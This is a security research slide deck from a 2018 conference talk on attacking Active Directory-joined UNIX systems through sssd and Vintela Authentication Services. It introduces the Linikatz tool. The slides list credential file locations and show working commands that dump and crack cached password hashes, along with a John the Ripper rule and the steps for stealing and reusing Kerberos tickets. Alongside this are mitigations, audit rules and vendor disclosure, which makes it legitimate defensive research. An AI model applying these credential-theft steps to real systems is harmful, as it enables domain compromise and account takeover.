PowerPoint Presentation Tim (Wadhwa-)Brown Head Of Research, CX EMEAR Security Architecture November, 2018 Bringing Mimikatz et al to UNIX Where 2 worlds collide © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Introduction © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Introduction • TLDR • # whoami • # cat .plan © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential TLDR • Presentation is WIP • Has been iteratively improved off and on over ~9 months • Contains bonus material from directors cut at the end • What this talk is not about • Kerberos, LDAP, AD and all that jazz • https://speakerdeck.com/ropnop/fun-with-ldap- kerberos-and-msrpc-in-ad-environments • What this talk is about • Why a domain joined UNIX box matters to Enterprise Admins • How AD based trust relationships on a UNIX boxes are abused • How UNIX admins can help mitigate the worst side effects https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential # whoami • Tim (Wadhwa-)Brown • Background in telecoms and financial services sectors • 14+ years at Portcullis (and now Cisco) • Head Of Research, CX EMEAR Security Architecture • >120 CVEs to my name • Covering Windows, Linux, AIX and Solaris platforms • Userland through to kernel © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential # cat .plan • Background • The theory • Attack chains • Practical attacks • Mitigations • Recommendations • Response • Conclusions • Bonus material © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Background © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Background • Uptick in "interesting" UNIX infrastructures being integrated into customers' existing AD forests • Threat models should be quite familiar to anyone securing a heterogeneous Windows network but… • Perhaps not by a typical UNIX admin who does not have a strong background in Windows and AD • Let’s look at specific AD integration solutions (both open and closed source) for UNIX systems and documenting some of the tools, tactics and procedures that enable attacks on the forest © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Case studies • Specifically… • We keep running into Vintela Authentication Services • There’s little or no prior research to speak of • What about other similar solutions? © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Why does this matter? • Cisco is expected to push the IT envelope • CSIRT need to keep our AD estate secure • Security Advisory is expected to give expert guidance from both a blue and red team perspective • Talos, ATA et al are expected to provide cutting edge threat detection • Our customers want to mature their security posture from a defensive standpoint © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential The theory © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Introducing AD on UNIX © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Like LSASS, limited GPO support © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Attack chains © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Vintela Authentication Services* * AKA One Identity Authentication Services © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Here be dragons? Interesting? © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Other vendors do exist* * Mo’ binaries, mo’ bugs… the pace of research determines the pace of disclosure but have already started speaking to them © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Fundamental truth • Windows security has progressed • Linux and UNIX security is still stuck in the mid 70s • Reliant on UIDs and GIDs • Largely applied at file system © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Windows 8.1 has… • Restricted admin mode for RDP • LSA protection • Protected Users security group • TPM © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Windows 10 has… • LSA credential isolation © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Me “What if I could get into a UNIX box and then breach your domain?” © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Thought process • UNIX box and the applications that run on them often suffer from technical debt • You submit your AD credentials to login over SSH • So tell me, what else do you have access to in Windows- land? • Also, how about other UNIX systems? © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Practical attacks © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Practical attacks • Sssd • Vintela Authentication Services • LDAP • Kerberos © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sssd • Open source • Potential attacks • Stealing hashes from the file system • Stealing hashes and plain text from memory • Messing with the IPC • Notes for the blue team • Runs as “root” user • Integrates with SELinux • Has compile time hardening © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sssd has a somewhat patchy record • CVE-2018-10832 – Allows enumeration of sudo rules • CVE-2017-12173 – Allows cached hashes to be retrieved • CVE-2013-0219 – Allows abuse of symlink based race conditions • Many, many crashes • POCs please? © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential But we digress… © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sssd Filename Contains Useful /var/lib/sss/db/cache..ldb Cached hashes /var/lib/sss/db/ccache_ Server ticket cache for authenticating to the KDC /var/lib/sss/db/config.ldb Configuration /var/lib/sss/pipes/{nss,pam} PAM to sssd IPC /var/lib/sss/pipes/private/{pam,sbus-*} PAM and SBus private IPC /tmp/ccache_ Per-user ticket cache for authenticating to the KDC /etc/sssd/sssd.conf Configuration /etc/krb5.keytab Server keytab for authenticating to the KDC Yes Maybe © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Vintela Authentication Services • Proprietary, multi-platform • Potential attacks • Stealing hashes from the file system • Stealing hashes and plain text from memory • Messing with the IPC • Notes for the blue team • Runs as “daemon” but doesn’t drop real UID 0 • Has no compile time hardening • Has no integration with SELinux © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Vintela Authentication Services Filename Contains Useful /var/opt/quest/vas/authcache/vas_auth.vdb Cached hashes /var/opt/quest/vas/vasd/vas_ident.vdb AD/POSIX metadata /var/opt/quest/vas/vasd/vas_misc.vdb Configuration /var/opt/quest/vas/vasd/.vasd40_ipc_sock PAM to vasd IPC /tmp/krb55cc. Per-user ticket cache for authenticating to the KDC /etc/opt/quest/vas/vas.conf Configuration /etc/opt/quest/vas/host.keytab Server keytab for authenticating to the KDC Yes Maybe © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential LDAP • Stealing hashes and plain text from memory • MiTM attacks due to incorrectly enforced SSL • Injection attacks due to missing input validation © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Kerberos • Stealing tickets from the file system © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Introducing Linikatz © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Introducing Linikatz • Setting the bar low^Whigh • We need UID 0 to perform these attacks • These attacks are (now) well known in the Windows world • But… • Hashes • Plain text • Tickets © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Stealing hashes • Hashes can be stolen with standard UNIX tools • Find, cp • Actually using them takes a bit more work! © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Breaking hashes • Sssd? • Vintela Authentication Services? © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential # tdbdump /var/lib/sss/db/cache_3RD- PARTY.EXAMPLE.ORG.ldb | grep cachedPassword | cut -f 2-4 -d "$" | cut -f 1 -d "\\" | sed "s/^/$/g" $6$ypUn2CGi5h3aAqfA$pHxtykM4a6aC G1XQXnyClqtCPeDgDOA4nIDIeMWv2vlD 1dxld0hc9fAc4252l5U8/2Ju0mUTE/u4Kr SET7pCF. # tdbdump /var/lib/sss/db/cache_3RD- PARTY.EXAMPLE.ORG.ldb | grep cachedPassword | cut -f 2-4 -d "$" | cut -f 1 -d "\\" | sed "s/^/$/g" > hash.txt # JohnTheRipper-1.8.0-jumbo- 1/run/john --wordlist=dict.txt hash.txt … Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 64/64 OpenSSL]) # JohnTheRipper-1.8.0-jumbo- 1/run/john --show hash.txt ?:Administrat0r!1 password hash cracked, 0 left Sssd © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Vintela Authentication Services? • SQLite database • Bespoke hashing algorithms • Yay, symbols © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Bespoke hashing algorithms • Legacy – not found in the wild • Sha1256 – I needed to reverse the algorithm and implement in JtR • Salted with UUID • Formatting important © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential UUID CONST1 (#) CONST2 (-) password © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential [List.Generic:dynamic_1602] Expression=sha256(#.$salt.-.$pass) vas_auth Flag=MGF_INPUT_32_BYTE Flag=MGF_USERNAME Flag=MGF_SALTED Flag=MGF_FLAT_BUFFERS CONST1=# CONST2=- SALTLEN=36 Func=DynamicFunc__clean_input Func=DynamicFunc__append_input _from_CONST1 Func=DynamicFunc__append_salt Func=DynamicFunc__append_input _from_CONST2 Func=DynamicFunc__append_keys Func=DynamicFunc__SHA256_crypt _input1_to_output1_FINAL Test=$dynamic_1602$$::<username> JtR rules © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Recovering long forgotten memories • Again we can use “standard” tools to perform plain text recovery on processes • gcore||gdb, strings © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Please accept my stolen ticket • Abusing stolen tickets requires a bit more tailored tooling • Samba’s smbclient & rpcclient • smbclient –k –W <domain> -L //<hostname> • Core Security’s Impacket libraries • -k --nopass <domain>/<username> • Mimikatz – works from 2014 • kerberos::clist <ccache> /export – turns UNIX tickets into .kirbi files • SSH – not usually supported in practice • Wireshark – supports loading keytabs to decrypt traffic • Xfreerdp – need to evaluate © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential administrator@3RD-PARTY.EXAMPLE.ORG@LNX:~$ klist Ticket cache: FILE:/tmp/krb5cc_1245800500_FHo81C Default principal: Administrator@3RD-PARTY.EXAMPLE.ORG Valid starting Expires Service principal 16/05/18 10:18:23 16/05/18 20:18:23 krbtgt/3RD- PARTY.EXAMPLE.ORG@3RD-PARTY.EXAMPLE.ORG renew until 17/05/18 10:18:23 16/05/18 10:18:26 16/05/18 20:18:23 cifs/3rd-party-dc.3rd- party.example.org@3RD-PARTY.EXAMPLE.ORG # cp /tmp/krb5cc_1245800500_FHo81C /tmp/foo # chown user:user /tmp/foo # su - user user@LNX:~$ export KRB5CCNAME=FILE:/tmp/foo user@LNX:~$ klist Ticket cache: FILE:/tmp/foo Default principal: Administrator@3RD-PARTY.EXAMPLE.ORG Valid starting Expires Service principal 16/05/18 10:18:23 16/05/18 20:18:23 krbtgt/3RD- PARTY.EXAMPLE.ORG@3RD-PARTY.EXAMPLE.ORG renew until 17/05/18 10:18:23 16/05/18 10:18:26 16/05/18 20:18:23 cifs/3rd-party-dc.3rd- party.example.org@3RD-PARTY.EXAMPLE.ORG Changing identities © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential What does Linikatz actually get us? • Similar to Mimikatz • A simple shell script • Capabilities • Extracts cached hashes • Scrapes process memory for plain text credentials • Locates and steals kerberos tickets • Dumps configuration and other metadata © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential And also… • Post-exploitation modules for Metasploit • JtR rules for cracking cached hashes • Auditd policies to help blue teams • Eventually… research notes, fuzzers etc © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://github.com/portcullis labs/linikatz* * Blue and red team goodness! © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Linikatz repo • linikatz.sh • red/ • JohnTheRipper/ • dynamic.conf • metasploit-framework/ • unix_cached_ad_hashes.rb • unix_kerberos_tickets.rb • blue/ • audit/ • audit.rules • data/ • Will contain research notes • tools/ • Will contain tools that I’ve developed © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Mitigations © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Mitigations • Generic hardening • Restrict UID 0 • Restrict ptrace() • Protect resources with SELinux • Auditing? • RTFM © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Generic hardening • Turning off credential caching on Windows has been a standard issue in reports for ~10 years • Reducing plain text disclosures by tuning CredSSP has been a standard issue in reports for ~3-4 years • Avoid domain joined service access • Consider having separate domain accounts for (privileged) UNIX access • … and so on … © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Restrict UID 0 • Patch • unix-privesc-check © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Restrict ptrace() • Restrict CAP_SYS_PTRACE • Yama et al • getsebool deny_ptrace © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Protect resources with SELinux • Sssd* already does this • You’ll need to • Define entry points • Define process types • Label files * Breaking news, apparently so does Vintela (if you manage to locate their GitHub repo) © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Auditing? • Auditing is rarely turned on • In cases where auditing is available, it’s not ingested into the threat analytics platform © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential RTFM • https://linux.die.net/man/5/ss sd.conf • Credential caching • https://support.oneidentity.co m/authentication- services/kb/71261/vas-conf- manpage-for-qas-3-5-2 • Keytab encryption types • Credential caching • etc https://linux.die.net/man/5/sssd.conf https://support.oneidentity.com/authentication-services/kb/71261/vas-conf-manpage-for-qas-3-5-2 © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Ensure Kerberos isn’t enabled in SSH if you’re not using it • Both sssd and Vintela Authentication Services will enable Kerberos ticket generation • Not actually used • Probably not switched on • Check! © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Recommendations © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Recommendations • Harden your binaries • Permissions • Memory management • Cryptography © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Permissions • Drop unnecessary privileges entirely • Don’t leave sockets world writable • Don’t leave configuration and metadata world readable © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Memory management • Harden your binaries • Canaries (SSP) • ASLR (PIE/RELRO) • Sandboxing (SecComp) • Protect sensitive memory • Restrict ptrace() using PTRACE_TRACEME • Consider memset() to clean down memory after use © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Cryptography • Utilise constant time comparisons or blinding for cryptographic comparisons • KDFs are more suitable than hashing functions for storing credentials • Many rounds make work harder © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Response © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential One Identity - Vintela • Shared their internal SDK which will help me improve my IPC fuzzing • Have implemented bcrypt() KDF to replace their existing hashing algorithm • Have been working on a cleanup thread to clean down memory (until now, cleanup was only triggered on when objects went out of scope on access) • Pointed me at their SELinux policies © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Other vendors • Equally responsive but shorter timelines… © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Conclusions © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Conclusions • What have we learnt? • Next steps? • Thanks © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential What have we learnt? • Compromising a domain joined UNIX box could be an easier way into an AD estate • Hashes and passwords may not be well protected on UNIX • Processes certainly aren’t • Trust relationships may not be well understood • AD on UNIX solutions come with tools to talk to the domain controller (and not just using Kerberos) • Always read the manual • More research is required! © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Next steps? • Continued research on Vintela Authentication Services IPC • POCs for the known Sssd issues • Continued work with vendors • Focused research on UNIX Group Policy implementations • Improving Meterpreter post- exploitation modules • No memory dumping capability yet © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Thanks • Active help • @santosomar et al – Cisco PSIRT/CSIRT liaison • @solardiz – Support with JtR rules • Borrowed ideas • @gentilkiwi – Mimikatz • @coresecurity – Impacket • @ropnop – Will abuse /tmp/krb5* for tickets • @pentestmonkey – UNIX privesc partner in crime • @bdamele – Keimpx • Many, many more! © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Special thanks • Vendors (One Identity et al) • All of whom have been responsive and professional • We don’t acknowledge the good guys enough! © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Questions? twadhwab@cisco.com / @timb_machine © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Bonus material © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Approach • Iterative • Build • Threat model • Audit • Review • Fuzz • Reverse • Develop • “Fuzz”x2 • Ouput © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Build • Create AD forest • Add UNIX extensions to AD • Create test accounts for each implementation • Domain join Linux clients • Curse every 180 days © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Threat model • Cisco’s Threat Builder • Alternative approaches • Microsoft’s STRIDE • Microsoft’s Threat Modelling Tool • Build a list of things I want to check – Excel (really!) • TTPs for Windows adversaries © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Audit • Baseline before and after • Review changes • File locations and permissions – find • File contents – vbindiff, hexcurses, strings, grep • Processes – ps, /proc • Sockets – lsof, netstat • Binary SDLC compliance - checksec.sh – shell script © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Review • Understand how the application is meant to function • Man pages • Configs • Logs • Turning logging up to maximum really helps • Data • Internet © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Reverse • Quick and nasty – core dumps • Understanding the process flow – strace and ltrace • Getting a feel for the implementation - Hopper • Documenting key functions - Binary Ninja © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Fuzz • UNIX sockets • UNIXSocketScanner • Socat • But they didn’t work… • I only spotted this several iterations in… • sendmsg() allows you to send a file descriptor • None of the standard UNIX tools for working with UNIX sockets really deal with this • Vintela uses this to authenticate the client • Easy to work around once you spot it • Someone needs to fix socat and UNIXSocketScanner • Kerberos, LDAP implementations etc • Not looked at yet © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Develop • Crunching data – shell script • Creating fuzzing corpus – Perl • Extract hex from logs • Generate C from hex • Fuzzers – C, Perl • Crash handler – shell script • dmesg | grep vasd | tail –n 1 > state.new • if [ -n “$(diff state.new state.old)” ] • We have a winner! • Do sensible things © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential “Fuzz”x2 • Turn up auditing • Extract hexdump from logs • Charlie Miller’s patented dumbfuzz © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Output • exercise.sh – uses vastool etc to exercise vasd causing syslog to be filled with hexdumps • rippackets.pl – pipe syslog logs into it to extract raw hexdumps for use as test cases • vipcreplay.c – generate and replay all test cases (see replay.c) • replay.c – replay test cases • vipcpoke.c – replay a single test case • replay/checkcrash.sh – check for and process crashes • vipcfuzz.c – generate and dumbfuzz all test cases (see fuzz.c) • fuzz.c – fuzzing test cases • checkcrash.sh – check for and process crashes © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Useful links • https://speakerdeck.com/ropnop/fun- with-ldap-kerberos-and-msrpc-in-ad- environments - using UNIX tools to attack AD DCs • https://github.com/rapid7/metasploit- framework/wiki/How-to-get-started- with-writing-a-post-module – writing Metasploit post-exploitation modules • http://web.archive.org/web/2016120 5150219/http://blog.thireus.com/john -the-ripped-steak-and-french-fries- with-salt-and-pepper-sauce-for- hungry-password-crackers/ - writing JtR dynamic.conf rules • https://github.com/bfuzzy/auditd- attack - example rules for auditd, modelled on ATT&CK https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module http://web.archive.org/web/20161205150219/http:/blog.thireus.com/john-the-ripped-steak-and-french-fries-with-salt-and-pepper-sauce-for-hungry-password-crackers/ https://github.com/bfuzzy/auditd-attack